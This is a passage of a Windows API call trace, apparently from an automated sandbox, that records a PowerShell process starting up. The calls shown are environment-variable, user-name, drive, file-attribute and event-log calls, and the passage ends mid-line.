[0153.447] GetLastError () returned 0xcb [0153.448] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0153.448] GetLastError () returned 0xcb [0153.448] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0153.448] GetLastError () returned 0xcb [0153.448] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12e3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0153.448] GetLastError () returned 0xcb [0153.448] SetErrorMode (uMode=0x1) returned 0x1 [0153.448] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12e844 | out: lpFileInformation=0x12e844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.448] GetLastError () returned 0xcb [0153.448] SetErrorMode (uMode=0x1) returned 0x1 [0153.460] GetLogicalDrives () returned 0x4 [0153.460] GetLastError () returned 0xcb [0153.499] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12e2e8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.499] GetLastError () returned 0xcb [0153.500] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.500] GetLastError () returned 0xcb [0153.500] SetErrorMode (uMode=0x1) returned 0x1 [0153.502] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x509da8, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12e810, lpMaximumComponentLength=0x12e80c, lpFileSystemFlags=0x12e808, lpFileSystemNameBuffer=0x509ca8, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e810*=0x705ba84c, lpMaximumComponentLength=0x12e80c*=0xff, lpFileSystemFlags=0x12e808*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0153.502] GetLastError () returned 0xcb [0153.502] SetErrorMode (uMode=0x1) returned 0x1 [0153.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.502] GetLastError () returned 0xcb [0153.502] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12e370, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.502] GetLastError () returned 0xcb [0153.502] SetErrorMode (uMode=0x1) returned 0x1 [0153.502] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3442428 | out: lpFileInformation=0x3442428*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.502] GetLastError () returned 0xcb [0153.502] SetErrorMode (uMode=0x1) returned 0x1 [0153.503] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12e370, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.503] GetLastError () returned 0xcb [0153.503] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12e2fc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.503] GetLastError () returned 0xcb [0153.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.503] GetLastError () returned 0xcb [0153.504] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12e2b8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.504] GetLastError () returned 0xcb [0153.504] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.505] GetLastError () returned 0xcb [0153.505] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.505] GetLastError () returned 0xcb [0153.505] SetErrorMode (uMode=0x1) returned 0x1 [0153.505] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3443080 | out: lpFileInformation=0x3443080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.506] GetLastError () returned 0xcb [0153.506] SetErrorMode (uMode=0x1) returned 0x1 [0153.506] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12e2c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.506] GetLastError () returned 0xcb [0153.506] SetErrorMode (uMode=0x1) returned 0x1 [0153.506] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34431d0 | out: lpFileInformation=0x34431d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.506] GetLastError () returned 0xcb [0153.506] SetErrorMode (uMode=0x1) returned 0x1 [0153.506] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12e30c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.506] GetLastError () returned 0xcb [0153.506] SetErrorMode (uMode=0x1) returned 0x1 [0153.506] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3443370 | out: lpFileInformation=0x3443370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.506] GetLastError () returned 0xcb [0153.506] SetErrorMode (uMode=0x1) returned 0x1 [0153.507] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12e894 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12e894) returned 0x1 [0153.507] GetLastError () returned 0xcb [0153.507] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12e89c | out: lpBuffer="aETAdzjz", pcbBuffer=0x12e89c) returned 1 [0153.508] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34460a4*="FileSystem", lpRawData=0x3445f60) returned 1 [0153.512] GetLastError () returned 0x0 [0153.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.513] GetLastError () returned 0xcb [0153.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.513] GetLastError () returned 0xcb [0153.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.513] GetLastError () returned 0xcb [0153.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.514] GetLastError () returned 0xcb [0153.514] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12e894 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12e894) returned 0x1 [0153.514] GetLastError () returned 0xcb [0153.514] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12e89c | out: lpBuffer="aETAdzjz", pcbBuffer=0x12e89c) returned 1 [0153.515] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x344a140*="Function", lpRawData=0x3449ffc) returned 1 [0153.522] GetLastError () returned 0x0 [0153.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.526] GetLastError () returned 0xcb [0153.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.547] GetLastError () returned 0xcb [0153.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e258, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.547] GetLastError () returned 0xcb [0153.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e258, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.547] GetLastError () returned 0xcb [0153.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e258, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.547] GetLastError () returned 0xcb [0153.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.616] GetLastError () returned 0xcb [0153.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e258, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.616] GetLastError () returned 0xcb [0153.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e258, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.616] GetLastError () returned 0xcb [0153.618] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12e894 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12e894) returned 0x1 [0153.618] GetLastError () returned 0xcb [0153.618] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12e89c | out: lpBuffer="aETAdzjz", pcbBuffer=0x12e89c) returned 1 [0153.619] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34631a8*="Registry", lpRawData=0x3463064) returned 1 [0153.621] GetLastError () returned 0x0 [0153.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.622] GetLastError () returned 0x0 [0153.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.623] GetLastError () returned 0x0 [0153.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0153.623] GetLastError () returned 0x0 [0153.623] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12e894 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12e894) returned 0x1 [0153.624] GetLastError () returned 0x0 [0153.624] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12e89c | out: lpBuffer="aETAdzjz", pcbBuffer=0x12e89c) returned 1 [0153.625] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3466f3c*="Variable", lpRawData=0x3466df8) returned 1 [0153.625] GetLastError () returned 0x0 [0153.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.627] GetLastError () returned 0xcb [0153.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.629] GetLastError () returned 0xcb [0153.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0153.630] GetLastError () returned 0xcb [0153.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12e244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0153.631] GetLastError () returned 0xcb [0153.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12e244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0153.631] GetLastError () returned 0xcb [0153.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12e244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0153.631] GetLastError () returned 0xcb [0153.746] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x50a468, nSize=0x12e894 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12e894) returned 0x1 [0153.746] GetLastError () returned 0x3 [0153.746] GetUserNameW (in: lpBuffer=0x509ca8, pcbBuffer=0x12e89c | out: lpBuffer="aETAdzjz", pcbBuffer=0x12e89c) returned 1 [0153.747] ReportEventW (hEventLog=0x4f20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3474dd4*="Certificate", lpRawData=0x3474c90) returned 1 [0153.773] GetLastError () returned 0x0 [0153.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.802] GetLastError () returned 0xcb [0153.804] GetLogicalDrives () returned 0x4 [0153.804] GetLastError () returned 0xcb [0153.804] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12e40c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.804] GetLastError () returned 0xcb [0153.804] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.804] GetLastError () returned 0xcb [0153.811] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x509ca8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.811] GetLastError () returned 0xcb [0153.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.812] GetLastError () returned 0xcb [0153.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.812] GetLastError () returned 0xcb [0153.909] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.909] GetLastError () returned 0xcb [0153.924] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.924] GetLastError () returned 0xcb [0153.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.925] GetLastError () returned 0xcb [0153.925] SetErrorMode (uMode=0x1) returned 0x1 [0153.925] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x347bcf4 | out: lpFileInformation=0x347bcf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0153.925] GetLastError () returned 0xcb [0153.925] SetErrorMode (uMode=0x1) returned 0x1 [0153.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e25c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.925] GetLastError () returned 0xcb [0153.925] SetErrorMode (uMode=0x1) returned 0x1 [0153.925] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x347be88 | out: lpFileInformation=0x347be88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0153.926] GetLastError () returned 0xcb [0153.926] SetErrorMode (uMode=0x1) returned 0x1 [0153.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.932] GetLastError () returned 0xcb [0153.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e3a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.945] GetLastError () returned 0xcb [0153.946] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12e320, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.946] GetLastError () returned 0xcb [0153.946] SetErrorMode (uMode=0x1) returned 0x1 [0153.946] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12e7a0 | out: lpFileInformation=0x12e7a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.946] GetLastError () returned 0xcb [0153.946] SetErrorMode (uMode=0x1) returned 0x1 [0153.946] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12e320, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.946] GetLastError () returned 0xcb [0153.946] SetErrorMode (uMode=0x1) returned 0x1 [0153.946] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12e7a0 | out: lpFileInformation=0x12e7a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0153.946] GetLastError () returned 0xcb [0153.946] SetErrorMode (uMode=0x1) returned 0x1 [0153.946] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12e334, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.946] GetLastError () returned 0xcb [0153.946] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0153.946] GetLastError () returned 0xcb [0153.947] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12e320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0153.947] GetLastError () returned 0xcb [0153.947] SetErrorMode (uMode=0x1) returned 0x1 [0153.947] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12e7a0 | out: lpFileInformation=0x12e7a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x574268e0, ftLastAccessTime.dwHighDateTime=0x1d466db, ftLastWriteTime.dwLowDateTime=0x574268e0, ftLastWriteTime.dwHighDateTime=0x1d466db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0153.947] GetLastError () returned 0xcb [0153.947] SetErrorMode (uMode=0x1) returned 0x1 [0153.947] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12e320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0153.947] GetLastError () returned 0xcb [0153.947] SetErrorMode (uMode=0x1) returned 0x1 [0153.947] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12e7a0 | out: lpFileInformation=0x12e7a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x574268e0, ftLastAccessTime.dwHighDateTime=0x1d466db, ftLastWriteTime.dwLowDateTime=0x574268e0, ftLastWriteTime.dwHighDateTime=0x1d466db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0153.947] GetLastError () returned 0xcb [0153.947] SetErrorMode (uMode=0x1) returned 0x1 [0153.947] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12e334, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0153.947] GetLastError () returned 0xcb [0153.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0153.947] GetLastError () returned 0xcb [0153.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12e320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.947] GetLastError () returned 0xcb [0153.947] SetErrorMode (uMode=0x1) returned 0x1 [0153.947] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12e7a0 | out: lpFileInformation=0x12e7a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0153.948] GetLastError () returned 0xcb [0153.948] SetErrorMode 